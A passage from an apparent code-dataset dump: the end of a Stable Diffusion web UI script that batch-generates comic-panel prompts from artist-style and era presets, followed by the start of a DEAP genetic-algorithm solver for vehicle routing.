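# (added note, illustrative) each entry maps a tag to a coercion function,\n# e.g. prompt_tags[\"steps\"](\"20\") -> 20 and prompt_tags[\"cfg_scale\"](\"7.5\") -> 7.5,\n# so cmdargs() below can turn \"--steps 20 --cfg_scale 7.5\" into\n# {\"steps\": 20, \"cfg_scale\": 7.5}.\n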
\ndef cmdargs(line):\n # parse shlex-style command line options into a processing-args dict\n args = shlex.split(line)\n pos = 0\n res = {}\n\n while pos < len(args):\n arg = args[pos]\n\n assert arg.startswith(\"--\"), f'must start with \"--\": {arg}'\n assert pos + 1 < len(args), f'missing argument for command line option {arg}'\n\n tag = arg[2:]\n\n if tag == \"prompt\" or tag == \"negative_prompt\":\n pos += 1\n prompt = args[pos]\n pos += 1\n while pos < len(args) and not args[pos].startswith(\"--\"):\n prompt += \" \"\n prompt += args[pos]\n pos += 1\n res[tag] = prompt\n continue\n\n func = prompt_tags.get(tag, None) # look up the converter for this tag\n assert func, f'unknown commandline option: {arg}'\n\n val = args[pos + 1]\n if tag == \"sampler_name\":\n val = sd_samplers.samplers_map.get(val.lower(), None)\n\n res[tag] = func(val)\n\n pos += 2\n\n return res\n\n\nmtt1 = \"(((Black and white comic page content))),(Black hair),\"\nmtt2 = \" ((Colorful manga,Dialogue bubble box, Animated movies)),\"\nmtt3 = \"Magnificent and breathtaking wallpapers that steal the show, \"\n\n\ndef load_prompt_file(file):\n if file is None:\n lines = []\n else:\n lines = [x.strip() for x in file.decode('utf8', errors='ignore').split(\"\\n\")]\n\n return None, \"\\n\".join(lines), gr.update(lines=7)\n\n\ndef ddd(num):\n if num == 0:\n return \"\"\n else:\n return '(' * num + 'Sense of speed' + ')' * num\n\n\ndef ttxq(num):\n if num == 0:\n return \"\"\n else:\n return '(' * num + 'Full-frame fisheye visualization,' + ')' * num\n\n\nmqfd = \"Close-up, extreme close-up, medium close-up, medium shot, medium long shot, long shot, extreme long shot, full shot, cowboy shot, bird's eye view, worm's eye view, high angle, low angle, Dutch angle, straight-on angle, over-the-shoulder shot, point-of-view shot, two-shot, three-shot, establishing shot, cutaway shot, reaction shot, insert shot, off-screen shot, reverse angle, top shot, bottom shot, tilt shot, pan shot, zoom in shot, zoom out shot, dolly in shot, dolly out shot, tracking shot, steadicam shot, handheld shot, crane shot, aerial shot, split screen shot, freeze frame shot.\"\n\n\ndef qqq(num):\n if num == 0:\n return \"\"\n elif num < 0:\n return '(' * abs(num) + '(Cute art style),' + ')' * abs(num)\n else:\n return '(' * num + 'Realistic style,' + ')' * num\n\n\ndef tttrt(fff):\n if fff == 0:\n return \"\"\n elif fff < 0:\n return '(' * abs(fff) + '(Horror, gloomy visuals),' + ')' * abs(fff)\n else:\n return '(' * fff + 'Sunshine, optimistic visuals,' + ')' * fff\n\n\ndef get_name(name_str):\n name_list = name_str.split('-')\n return '({})'.format(name_list[0].strip())\n\n\ndef txttf(text):\n pattern = 
r'[。!?\\?\\n;;,\\.\\s]'\n lines = re.split(pattern, text)\n lines = [line.strip() for line in lines if line.strip()]\n return '\\n'.join(lines)\n\n\ndef kkkk(sentence, word_str):\n word_dict = {}\n try:\n for pair in word_str.split(\",\"):\n if not pair:\n continue\n old_word, new_word = pair.split(\"-\")\n word_dict[old_word.strip()] = new_word.strip()\n except ValueError:\n return sentence\n for old_word, new_word in word_dict.items():\n if old_word.isupper():\n sentence = sentence.replace(old_word, new_word.upper())\n else:\n sentence = sentence.replace(old_word, new_word)\n result = sentence.title()\n result = re.sub('(<.*?>)', lambda m: m.group().lower(), result)\n return result\n\n\nqqta = \"把剧本填写在这里~~(1 girl),(1 boy),(2 people),\"\n\nppt = \",Movie shots, \"\ndddf = \",stone, \"\nmtt = \",kkk, \"\ncccctt = \"Left, right, up, down, forward, backward, north, south, east, west, northeast, northwest, southeast, southwest, horizontal, vertical, diagonal, ascending, descending, clockwise\"\nggg = \"\"\ndddtt = \"Horizon, Cascade, Serenity, Luminous, Whirlpool, Twilight, Radiance, Oasis, Spectrum, Reflection, Infinity, Aurora, Harmony, Velocity, Enigma, Eclipse, Galaxy, Mirage, Thunderstorm, Cosmos,Synthesis, Blossom, Chaos, Solitude, Vibrance, Illusion, Euphoria, Nebula, Phoenix, Melancholy\"\nmcc = \"\"\nddc = \"\"\nqdf = \"\"\n\n\nclass Script(scripts.Script):\n def title(self):\n return \"AI漫画助手v3.0 作者咸蛋酱\"\n\n def ui(self, is_img2img):\n\n with gr.Row():\n xtf = gr.Dropdown(label=\"选择作者画风(预设)-- [如果无效说明模型不包含这类数据]\",\n choices=[\" - 无\", \"Loish - 创新者\", \"Kim Jung Gi - 无限想象\", \"Artgerm - 超级女孩\", \"Sakimichan - 魔法奇谭\",\n \"James Paick - 未来科技\", \"Jock - 末日幸存者\", \"Bang Sangho - 斗鱼\", \"Stanley Lau - 正义联盟\",\n \"Yuehui Tang - 神话世界\", \"Krenz Cushart - 战斗机甲\", \"WLOP - 粉色噩梦\", \"Guweiz - 幸存者\",\n \"Fishball - 三体:死神永生\", \"Loish - 梦境之旅\", \"Artgerm - 帝国的崛起\", \"Hoon - 地球之子\",\n \"Kuvshinov Ilya - 暗影猎人\", \"Redjuice - 遥远的未来\", \"Koyorin - 星际公主\", \"Sakimichan - 龙珠:超级赛亚人\",\n \"James Paick - 星际之战\", \"Sparth (Nicolas Bouvier) - 未来城市\", \"Craig Mullins - 地球未来\",\n \"Ryan Meinerding - 漫威电影\", \"John Wallin Liberto - 外星空间\", \"Fenghua Zhong - 远古王朝\",\n \"Mike Nash - 魔法学院\", \"Sergey Kolesov - 超现实幻想\", \"Eytan Zana - 极光奇观\", \"Simon Weaner - 反乌托邦世界\",\n \"Stanley Lau - 神奇女侠: 马蒂斯之死\", \"Brom - 黑暗精灵\", \"Jock - 蝙蝠侠: 黑暗骑士归来\", \"Oliver Coipel - 金刚\",\n \"Beksinski - 外星人\", \"Yoshitaka Amano - 尤迪安\", \"Kekai Kotaki - 龙族起源\", \"Sachin Teng - 雪之女王\",\n \"Jasmine Becket-Griffith - 魔法国度\", \"Pascal Blanche - 星际探险家\", \"Joakim Ericsson - 阿拉德历险记\",\n \"Jesper Ejsing - 龙与地下城\", \"Ian McQue - 星际迷航\", \"Ryan Meinerding - 钢铁侠:英雄崛起\",\n \"Kekai Kotaki - 光与暗的传说\", \"Ruan Jia - 火影忍者\", \"Bastien Lecouffe Deharme - 神话传说\",\n \"Ryan Lang - 奇幻森林\", \"Daniel Kamarudin - 《魔兽世界》\", \"Eytan Zana - 未来战士\",\n \"Stan Lee - 蜘蛛侠、钢铁侠、雷神等漫威英雄\", \"Todd McFarlane - 脊柱之战、自杀小队\", \"Neil Gaiman - 沙曼、无人洛城\",\n \"Dave Gibbons - 世纪杀手\", \"Frank Miller - 蝙蝠侠:黑暗骑士归来、罪恶之城\",\n \"Bill Watterson - 柯南·伊素格、公园和斯皮格\", \"Osamu Tezuka - 铁臂阿童木、星球大战、菠萝超人\",\n \"Hayao Miyazaki - 龙猫、天空之城、千与千寻\", \"Robert Crumb - 乌托邦\", \"Al Hirschfeld - 百老汇剧院的演员插画\",\n \"Daniel Danger - 最后生还者 (插画师)\", \"Dave Rapoza - 忍者神龟 (插画师)\",\n \"Jessica Hische - 企鹅出版社 (插画师)\", \"Jock - 蝙蝠侠 (插画师)\", \"Ken Taylor - 盗梦空间 (插画师)\",\n \"Lauren Hom - 谷歌 (插画师)\", \"Loish - Wacom (插画师)\", \"Mike Mitchell - 漫威 (插画师)\",\n \"Shantell Martin - 纽约城市芭蕾舞团 (插画师)\", \"Stephen Bliss - 侠盗猎车手 (插画师)\", \"Steve Prescott - 战锤\",\n \"Yoshitaka Amano - 最终幻想\", \"Akira Toriyama - 龙珠\", \"Hayao 
Miyazaki - 千与千寻\",\n \"Osamu Tezuka - 铁臂阿童木\", \"Masamune Shirow - 攻壳机动队\", \"Takehiko Inoue - 灌篮高手\",\n \"Katsuhiro Otomo - AKIRA\", \"Tsutomu Nihei - BLAME!\", \"Kazuo Umezu - 漂流教室\",\n \"Hirohiko Araki - JoJo的奇妙冒险\", \"Rei Hiroe - 黑色底盘\", \"Yusuke Murata - 一拳超人\",\n \"Kentaro Miura - 烙印勇士\", \"Fumiya Sato - 杀戮都市\", \"Naoki Urasawa - MONSTER\", \"Tite Kubo - 死神\",\n \"Hiromu Arakawa - 钢之炼金术师\", \"Takeshi Obata - 死亡笔记\", \"CLAMP collective - 魔卡少女樱\",\n \"Rumiko Takahashi - 犬夜叉\", \"Ralph McQuarrie - 星球大战\", \"Syd Mead - 洛城机密\", \"Rick Baker - 狼人、星际迷航\",\n \"H.R. Giger - 异形\", \"Jean Giraud (Moebius) - 第五元素\", \"Yoshitaka Amano - 最终幻想\",\n \"Geof Darrow - 黑客帝国\", \"Nilo Rodis-Jamero - 星球大战\", \"Doug Chiang - 星球大战、阿凡达\", \"John Howe - 魔戒\",\n \"Alan Lee - 魔戒、霍比特人\", \"Stuart Craig - 哈利波特\", \"Kevin O'Neill - 世纪之战\", \"Alex McDowell - 迷雾之城\",\n \"Ken Adam - 詹姆斯•邦德系列电影\", \"CLAMP - 经久纱流、大场水滸传、某个科学的超电磁炮\",\n \"Koyoharu Gotouge - 鬼灭之刃\", \"Hajime Isayama - 进击的巨人\", \"Mitsuru Adachi - 双截龙\",\n \"Inio Asano - 国王游戏、好想告诉你\", \"Yusei Matsui - 暗杀教室\", \"Junji Ito - Uzumaki、镰仓物语、恶魔之谷\",\n \"Hiro Mashima - FAIRY TAIL、EDENS ZERO\", \"Kohei Horikoshi - 像素英雄\",\n \"Aka Akasaka - 与谍同谋、被讨厌的松本同学\", \"Kentarō Miura - 灌篮高手、小说家、新暗行御史\",\n \"Kengo Hanazawa - 吃人鬼、我与僵尸有个约会\", \"Yuki Tabata - 黑色五叶草\", \"Gege Akutami - 呪術廻戦\",\n \"Kousuke Oono - 一弹起始、蓝天航线\", \"Akiko Higashimura - 刺客伍六三、东京女子图鉴、虚构推理\",\n \"Io Sakisaka - 好想告诉你、罗曼蒂克的玩具、Honey and Clover\", \"Haruko Ichikawa - 一人之下、千古王者、山海情\",\n \"Haruka Kanda - 紫罗兰永恒花园、花开伊吕波、猎魔人\", \"Miyuki Nakayama - 战斗陀螺、洛克人X\",\n \"Paru Itagaki - 社长,戏说社员的恋爱\", \" Kouhei Aonishi - 大声展开!伸展吧!我的腰椎、钓鱼之夏、深夜食堂\",\n \"Fujimoto Tatsuki - 鬼滅之刃 炭治郎外传 悲伤之刃、CHAINSAWMAN\",\n \"Yuito Kimura - 重新起航的天之歌、谷底的那一抹阳光、白色相簿2\",\n \"Yuji Kaku - 圣断罗斯之魔女、绝命诗1816、麻衣的宇宙奇幻之旅\", \"Yoshitaka Amano - 宝石之国(插画师)\",\n \"Range Murata - 最终幻想XII、法师与猫(插画师)\", \"Kazuki Takahashi - 游戏王(插画师)\",\n \"Akihiko Yoshida - 光之海(插画师)\", \"Shunya Yamashita - 信长之野望Online、绝对领域战争(插画师)\",\n \"Tony Taka - 无双OROCHI系列、Fault!(插画师)\", \"Nishikiito - 食戟之灵(插画师)\",\n \"REDJUICE - Guilty Crown、Beatless(插画师)\", \"WIT STUDIO - 进击的巨人、在下坂本,有何贵干?(动画公司)\",\n \"Hiroshi Nagai - F-1 Grand Prix、F-1 Hero(插画师)\", \"HACCAN - 武器种族传说、墓之沙(插画师)\",\n \"Kisai Takayama - 魔卡少女樱、魔法骑士雷阿斯(插画师)\", \"CLAMP - 神之塔(插画师)\",\n \"Yuka Nakajima - Fate/Grand Order、乐园追放(插画师)\", \"Akiman - 街头霸王(插画师)\",\n \"Shigenori Soejima - 女神异闻录系列、CATHERINE FULL BODY(插画师)\", \"Koyori - 只有我能进入的隐藏迷宫(插画师)\",\n \"Oyari Ashito - 学院黙示录、英雄伝説 空の軌跡(插画师)\", \"Sakura Hanpen - 干支魂(插画师)\",\n \"Yoshinori Shizuma - 决斗!平安京、罪人与龙(插画师)\"], value=\"Yoshinori Shizuma - 决斗!平安京、罪人与龙(插画师)\",\n elem_id=self.elem_id(\"xtf\"))\n rtf = gr.Dropdown(label=\"选择时代背景(预设)\",\n choices=[\" - 无\", \"Middle Ages - 中世纪\", \"Renaissance - 文艺复兴\", \"Meiji Period - 日本明治時代\",\n \"Industrial Revolution - 工业革命\", \"Edo Period - 日本江戸時代\", \"Roaring Twenties - 繁华的二十年代\",\n \"Cold War era - 冷战时期\", \"Information Age - 信息时代\", \"Song Dynasty - 中华宋朝\", \"Digital Age - 数字时代\",\n \"Warring States Period - 中华战国时期\", \"Bronze Age - 青铜时代\", \"Iron Age - 铁器时代\",\n \"Classical Antiquity - 古典时代\", \"Victorian Era - 维多利亚时代\", \"Gilded Age - 镀金时代\",\n \"Jazz Age - 爵士时代\", \"Space Age - 太空时代\", \"Ancient Egypt - 古埃及\",\n \"Golden Age of Hollywood - 好莱坞黄金时代\", \"Tang Dynasty - 中华唐朝\", \"Post-Modernism - 后现代主义\",\n \"Era of Good Feelings - 平和年代\", \"Age of Enlightenment - 启蒙时代\", \"Gothic Period - 哥特式时期\",\n \"Age of Exploration - 探险时代\", \"Art Nouveau - 新艺术运动\", \"Ming Dynasty - 中华明朝\",\n \"Atomic Age - 原子时代\", \"Baroque Period - 巴洛克时期\", \"Modernism - 
现代主义\"],\n value=\" - 无\", elem_id=self.elem_id(\"rtf\"))\n\n # with gr.Row():\n # stf = gr.Dropdown(label=\"选择色调(预设)\", choices=[\" - 无\",\"Warm - 暖色调\", \"Cool - 冷色调\",\"Neutral - 中性色调\",\"Earthy - 泥土色调\",\"Pastel - 柔和色调\",\"Vibrant - 鲜艳色调\",\"Muted - 柔和色调\",\"Split-complementary - 分裂互补色调\",\"Monochromatic - 单色调\",], value=\"Muted - 柔和色调\", elem_id=self.elem_id(\"rtf\"))\n # btf = gr.Dropdown(label=\"选择漫画类型(预设)\", choices=[\" - 无\",\"Shonen Manga - 少年漫画\",\"Shojo Manga - 少女漫画\",\"Seinen Manga - 青年漫画\",\"Science Fiction Manga - 科幻漫画\",\"Gekiga - 剧情漫畫\",\"Kodomomuke Manga - 儿童漫画\",\"Fantasy Manga - 奇幻漫画\",\"Horror Manga - 恐怖漫画\",\"Sports Manga - 运动漫画\", \"Yaoi Manga - 耽美漫画\",\"Yuri Manga - 百合漫画\",], value=\"Shonen Manga - 少年漫画\", elem_id=self.elem_id(\"rtf\"))\n\n with gr.Row():\n seedX = gr.Number(label=\"Seed值,-1是随机,其他任意是稳定角色画风\", value=333, precision=2, elem_id=\"seedX\")\n MXT = gr.Number(label=\"连跑轮次,改多少轮,它就会跑多少轮,适合开随机变化抽卡\", value=1, precision=2, elem_id=\"MXT\")\n\n with gr.Row():\n CX1 = gr.Checkbox(label=\"随机微调【开启后,每个图的输出,随机细微变化,微调】\", value=False, display=\"inline\", elem_id=self.elem_id(\"CX1\"))\n CXt = gr.Checkbox(label=\"随机镜头【开启后会随机镜头拍摄,开启后镜头更生动!】\", value=False, display=\"inline\", elem_id=self.elem_id(\"CXt\"))\n tttr = gr.Slider(minimum=-6, maximum=6, step=1, label='画面气氛【左边恐怖阴暗,右边明亮乐观】', value=0, elem_id=self.elem_id(\"tttr\"))\n CXx = gr.Checkbox(label=\"分割文本【开启后会自动分割文本,适合粘贴整本小说用的。】\", value=False, display=\"inline\", elem_id=self.elem_id(\"CXx\"))\n PTX = gr.Textbox(\n label=\"列表输入,这里输入批处理文本或者剧本,每行会输出一张图。【推荐使用GPT来写分镜,一段一个分镜】【推荐画布尺寸:300*450,450*300 高清就开放大】\",\n value=qqta, lines=1, elem_id=self.elem_id(\"PTX\"))\n with gr.Row():\n M1 = gr.Textbox(label=\"主角描述1,例如:lala-穿着红色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M1\"))\n M2 = gr.Textbox(label=\"主角描述2,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M2\"))\n M3 = gr.Textbox(label=\"主角描述3,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M3\"))\n M4 = gr.Textbox(label=\"主角描述4,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M4\"))\n with gr.Row():\n M5 = gr.Textbox(label=\"主角描述5,例如:lala-穿着红色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M5\"))\n M6 = gr.Textbox(label=\"主角描述6,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M6\"))\n M7 = gr.Textbox(label=\"主角描述7,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M7\"))\n M8 = gr.Textbox(label=\"主角描述8,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M8\"))\n with gr.Row():\n M9 = gr.Textbox(label=\"主角描述9,例如:lala-穿着���色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M9\"))\n M10 = gr.Textbox(label=\"主角描述10,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M10\"))\n M11 = gr.Textbox(label=\"主角描述11,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M11\"))\n M12 = gr.Textbox(label=\"主角描述12,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M12\"))\n with gr.Row():\n M13 = gr.Textbox(label=\"主角描述13,例如:lala-穿着红色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M13\"))\n M14 = gr.Textbox(label=\"主角描述14,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M14\"))\n M15 = gr.Textbox(label=\"主角描述15,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M15\"))\n M16 = gr.Textbox(label=\"主角描述16,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M16\"))\n with gr.Row():\n M17 = gr.Textbox(label=\"主角描述17,例如:lala-穿着红色旗袍的女孩\", lines=1, elem_id=self.elem_id(\"M17\"))\n M18 = gr.Textbox(label=\"主角描述18,例如:jack-穿着绿色毛衣的男孩\", lines=1, elem_id=self.elem_id(\"M18\"))\n M19 = gr.Textbox(label=\"主角描述19,例如:maka-身上破烂不堪的僵尸\", lines=1, elem_id=self.elem_id(\"M19\"))\n M20 = 
gr.Textbox(label=\"主角描述20,例如:sara-穿花衬衫的30岁大叔\", lines=1, elem_id=self.elem_id(\"M20\"))\n\n with gr.Row():\n CX2 = gr.Checkbox(label=\"黑白漫画模式【开启后会输出为漫画的图】\", value=False, display=\"inline-block\", elem_id=self.elem_id(\"CX2\"))\n CX3 = gr.Checkbox(label=\"彩色漫画模式【开启后,会输出彩漫,会覆盖黑白】\", value=True, display=\"inline-block\", elem_id=self.elem_id(\"CX3\"))\n CX5 = gr.Checkbox(label=\"插画模式【开启后,会输出彩色插画,会覆盖彩漫】\", value=False, display=\"inline-block\", elem_id=self.elem_id(\"CX5\"))\n ttm = gr.Slider(minimum=-6, maximum=6, step=1, label='写实程度【往左边是卡通,往右边是写实】', value=0, elem_id=self.elem_id(\"ttm\"))\n with gr.Row():\n txtt = gr.Slider(minimum=0, maximum=6, step=1, label='透视强度【越强透视越狠】', value=0, elem_id=self.elem_id(\"txtt\"))\n fast = gr.Slider(minimum=0, maximum=6, step=1, label='动态强度【值越大,画面越动感,太大角色会崩】', value=0, elem_id=self.elem_id(\"fast\"))\n with gr.Row():\n ow_text = gr.Textbox(label=\"其他画风(输入画风,构图等等控制)最上面不选择的时候输入\", lines=1, elem_id=self.elem_id(\"CX4\"))\n style_txt = gr.Textbox(label=\"其他时代背景(时间,时代背景等.)最上面不选择的时候输入\", lines=1, elem_id=self.elem_id(\"style\"))\n flow_text = gr.Textbox(label=\"其他(可以补充任意词,会对每张图产生作用,比如lora之类的)\", lines=1, elem_id=self.elem_id(\"flow_text\"))\n file = gr.File(label=\"上传文件来载入任务列表,注意每行会产生一张图的任务。\", type='binary', elem_id=self.elem_id(\"file\"))\n file.change(fn=load_prompt_file, inputs=[file], outputs=[file, PTX, PTX])\n PTX.change(lambda tb: gr.update(lines=7) if (\"\\n\" in tb) else gr.update(lines=2), inputs=[PTX], outputs=[PTX])\n return [PTX, style_txt, flow_text, ow_text, seedX, CX1, CX2, CX3, CXt, MXT, fast, ttm, tttr, txtt, xtf, rtf, CX5, CXx, M1, M2, M3, M4, M5, M6,\n M7, M8, M9, M10, M11, M12, M13, M14, M15, M16, M17, M18, M19, M20]\n\n def run(self, p, PTX: str, style_txt: str, flow_text: str, ow_text: str, seedX: int, CX1: bool, CX2: bool, CX3: bool, CXt: bool, MXT: int,\n fast: int, ttm: int, tttr: int, txtt: int, xtf: str, rtf: str, CX5: bool, CXx: bool, M1: str, M2: str, M3: str, M4: str, M5, M6,\n M7, M8, M9, M10, M11, M12, M13, M14, M15, M16, M17, M18, M19, M20):\n global ppt, dddf\n\n qdf = f\",{PTX},\"\n if CXx:\n qdf = re.split(r'[.]', qdf)\n else:\n qdf = qdf.split(',')\n lines = [x.strip() for x in qdf if x.strip()]\n\n if not CXx:\n lines = [x.strip() for x in PTX.split('\\n') if x.strip()]\n\n lines = [x for x in lines if len(x) > 0]\n p.do_not_save_grid = True\n ppt = f\",{style_txt},\"\n dddf = f\",{flow_text},\"\n mtt = f\",{ow_text},\"\n c1 = f\"{M1},\"\n c2 = f\"{M2},\"\n c3 = f\"{M3},\"\n c4 = f\"{M4},\"\n c5 = f\"{M5},\"\n c6 = f\"{M6},\"\n c7 = f\"{M7},\"\n c8 = f\"{M8},\"\n c9 = f\"{M9},\"\n c10 = f\"{M10},\"\n c11 = f\"{M11},\"\n c12 = f\"{M12},\"\n c13 = f\"{M13},\"\n c14 = f\"{M14},\"\n c15 = f\"{M15},\"\n c16 = f\"{M16},\"\n c17 = f\"{M17},\"\n c18 = f\"{M18},\"\n c19 = f\"{M19},\"\n c20 = f\"{M20},\"\n jobs = []\n job_count = 0\n # mcc = get_name(stf)\n ddc = '(' + get_name(rtf) + ')'\n\n global ooo\n if \"hair\" in lines or \"cloth\" in lines:\n ooo = \"\"\n\n ggg = ooo + ppt + dddf\n\n if CX2:\n ggg = ggg + mtt1\n mcc = \"\"\n if CX3:\n ggg = ggg + mtt2\n if CX5:\n ggg = ggg + mtt3\n\n lines = lines * MXT\n\n for line in lines:\n args = {\"prompt\": line + '((' + get_name(xtf) + '))' + mtt + ddc + ggg + tttrt(tttr) + ddd(fast) + qqq(ttm) + ttxq(txtt)}\n job_count += args.get(\"n_iter\", p.n_iter)\n jobs.append(args)\n\n print(f\"准备 处理 {len(lines)} 行 在 {job_count} 任务列表,整个任务开始.\")\n if seedX != -1:\n p.seed = seedX\n\n state.job_count = job_count\n\n images = []\n all_prompts = []\n infotexts = []\n for n, args in 
enumerate(jobs):\n state.job = f\"{state.job_no + 1} out of {state.job_count}\"\n if CX1:\n args[\"prompt\"] = \"((\" + random.choice(cccctt.split(\",\")) + \"))\" + \",\" + args[\"prompt\"]\n if CXt:\n args[\"prompt\"] = \"((\" + random.choice(mqfd.split(\",\")) + \"))\" + \",\" + args[\"prompt\"]\n\n args[\"prompt\"] = kkkk(args[\"prompt\"],\n c1 + c2 + c3 + c4 + c5 + c6 + c7 + c8 + c9 + c10 + c11 + c12 + c13 + c14 + c15 + c16 + c17 + c18 + c19 + c20)\n print(\"----- Starting job:\", n + 1)\n copy_p = copy.copy(p)\n for k, v in args.items():\n setattr(copy_p, k, v)\n\n proc = process_images(copy_p)\n images += proc.images\n print(\" Rendered one image. seed:\", copy_p.seed)\n\n return Processed(p, images, p.seed, \"\", all_prompts=all_prompts, infotexts=infotexts)\n","repo_name":"wqjuser/batch-draw","sub_path":"scripts/jubenchajian.py","file_name":"jubenchajian.py","file_ext":"py","file_size_in_byte":27807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41359291856","text":"## Environment setup\nimport numpy as np\n# import matplotlib.pyplot as plt\nfrom deap import base, tools, creator, algorithms\nimport random\nfrom copy import deepcopy\n\n\n# Plotting configuration\nparams = {\n 'font.family': 'serif',\n 'figure.dpi': 300,\n 'savefig.dpi': 300,\n 'font.size': 12,\n 'legend.fontsize': 'small'\n }\n# plt.rcParams.update(params)\n\n\nclass DeapVrp:\n\n def __init__(self,NodeCoor,Demand,MaxLoad,fullDict,ServiceTime=1):\n creator.create('FitnessMin', base.Fitness, weights=(-1.0,)) # minimisation problem\n # give each individual a routes attribute to record the routes it encodes\n creator.create('Individual', list, fitness=creator.FitnessMin) \n self.dataDict = {}\n self.dataDict['NodeCoor'] = NodeCoor\n self.dataDict['Demand'] = Demand\n self.dataDict['MaxLoad'] = MaxLoad\n self.dataDict['ServiceTime'] = ServiceTime\n self.fullDict = fullDict\n\n def genInd(self):\n dataDict = self.dataDict\n nCustomer = len(dataDict['NodeCoor']) - 1 # number of customers\n perm = np.random.permutation(nCustomer) + 1 # random customer permutation; customers are numbered 1..n\n pointer = 0 # iteration pointer\n lowPointer = 0 # lower-bound pointer\n permSlice = []\n # while the pointer has not reached the end of the sequence\n while pointer < nCustomer -1:\n vehicleLoad = 0\n # keep loading while the vehicle is under capacity\n while (vehicleLoad < dataDict['MaxLoad']) and (pointer < nCustomer -1):\n vehicleLoad += dataDict['Demand'][perm[pointer]]\n pointer += 1\n # cut at a random break point chosen within the feasible loading range\n if lowPointer+1 < pointer:\n tempPointer = np.random.randint(lowPointer+1, pointer)\n permSlice.append(perm[lowPointer:tempPointer].tolist())\n lowPointer = tempPointer\n pointer = tempPointer\n else:\n permSlice.append(perm[lowPointer::].tolist())\n break\n # merge the route slices into one chromosome\n ind = [0]\n for eachRoute in permSlice:\n ind = ind + eachRoute + [0]\n return ind\n 
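# (added note, illustrative) a chromosome is the depot-joined concatenation of\n # the routes, e.g. ind = [0, 3, 1, 0, 4, 2, 0] encodes the two trips\n # 0->3->1->0 and 0->4->2->0; decodeInd() below recovers the per-route slices.\n 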
#-----------------------------------\n ## Fitness evaluation\n # chromosome decoding\n def decodeInd(self,ind):\n '''Decode a chromosome back into route slices; each route starts and ends with depot 0'''\n indCopy = np.array(deepcopy(ind)) # work on a copy so the chromosome itself is not modified\n idxList = list(range(len(indCopy)))\n zeroIdx = np.asarray(idxList)[indCopy == 0]\n routes = []\n for i,j in zip(zeroIdx[0::], zeroIdx[1::]):\n routes.append(ind[i:j]+[0])\n return routes\n\n def calDist(self,pos1, pos2):\n '''Distance helper: given the coordinates pos1 and pos2, return the distance between the two points\n input: pos1, pos2 -- (x,y) tuples\n output: Euclidean distance'''\n return np.sqrt((pos1[0] - pos2[0])*(pos1[0] - pos2[0]) + (pos1[1] - pos2[1])*(pos1[1] - pos2[1]))\n\n\n\n\n # ------------------ TODO: to be refined ------------------\n\n\n\n # for now the load penalty is a plain sum: the amount by which a route exceeds\n # the capacity is added directly onto the distance\n def loadPenalty(self,routes):\n '''Helper: crossover and mutation can produce individuals that violate the load constraint, so penalise them'''\n dataDict = self.dataDict\n penalty = 0\n # compute each route's load and add max(0, routeLoad - maxLoad) to the penalty\n for eachRoute in routes:\n routeLoad = np.sum([dataDict['Demand'][i] for i in eachRoute])\n penalty += max(0, routeLoad - dataDict['MaxLoad'])\n return penalty\n\n # ------------------ TODO: to be refined ------------------\n\n\n def calRouteLen(self,routes):\n '''Helper: return the total length of the given routes'''\n dataDict = self.dataDict\n totalDistance = 0 # total length over all routes\n for eachRoute in routes:\n # take each pair of adjacent nodes on the route and accumulate their distance\n for i,j in zip(eachRoute[0::], eachRoute[1::]):\n totalDistance += self.calDist(dataDict['NodeCoor'][i], dataDict['NodeCoor'][j]) \n return totalDistance\n\n def evaluate(self,ind):\n '''Fitness function: total length of the decoded routes plus the load penalty'''\n routes = self.decodeInd(ind) # decode the individual into routes\n totalDistance = self.calRouteLen(routes)\n return (totalDistance + self.loadPenalty(routes)),\n #-----------------------------------\n ## Crossover\n def genChild(self,ind1, ind2, nTrail=5):\n '''Crossover operator after the scheme in 《基于电动汽车的带时间窗的路径优化问题研究》 (EV routing with time windows); generates one child'''\n # pick a random sub-route subroute1 from ind1 and keep it up front\n routes1 = self.decodeInd(ind1) # decode ind1 into routes\n numSubroute1 = len(routes1) # number of sub-routes\n if numSubroute1<3:\n return []\n subroute1 = routes1[np.random.randint(0, numSubroute1)]\n # arrange the customers not visited by subroute1 in the order they appear in ind2\n unvisited = set(ind1) - set(subroute1) # customers that subroute1 does not visit\n unvisitedPerm = [digit for digit in ind2 if digit in unvisited] # ordered as in ind2\n if len(unvisitedPerm) == 0:\n return []\n # repeat the random splitting several times and keep the fittest layout\n bestRoute = None # container\n bestFit = np.inf\n for _ in range(nTrail):\n # randomly split the sequence into numSubroute1-1 sub-routes\n breakPos = [0]+random.sample(range(1,len(unvisitedPerm)),numSubroute1-2) # numSubroute1-2 break points\n breakPos.sort()\n breakSubroute = []\n # if len(breakPos)<=2:\n # continue\n for i,j in zip(breakPos[0::], breakPos[1::]):\n breakSubroute.append([0]+unvisitedPerm[i:j]+[0])\n breakSubroute.append([0]+unvisitedPerm[j:]+[0])\n # keep the best-scoring split:\n # add the previously extracted subroute1 to obtain a complete delivery plan\n breakSubroute.append(subroute1)\n # evaluate the generated routes\n routesFit = self.calRouteLen(breakSubroute) + self.loadPenalty(breakSubroute)\n if routesFit < bestFit:\n bestRoute = breakSubroute\n bestFit = routesFit\n # merge the fittest layout bestRoute into one chromosome\n child = []\n for eachRoute in bestRoute:\n child += eachRoute[:-1]\n return child+[0]\n\n def crossover(self,ind1, ind2):\n '''Crossover operation'''\n ind1[:], ind2[:] = self.genChild(ind1, ind2), self.genChild(ind2, ind1)\n return ind1, ind2\n\n #-----------------------------------\n ## Mutation\n 
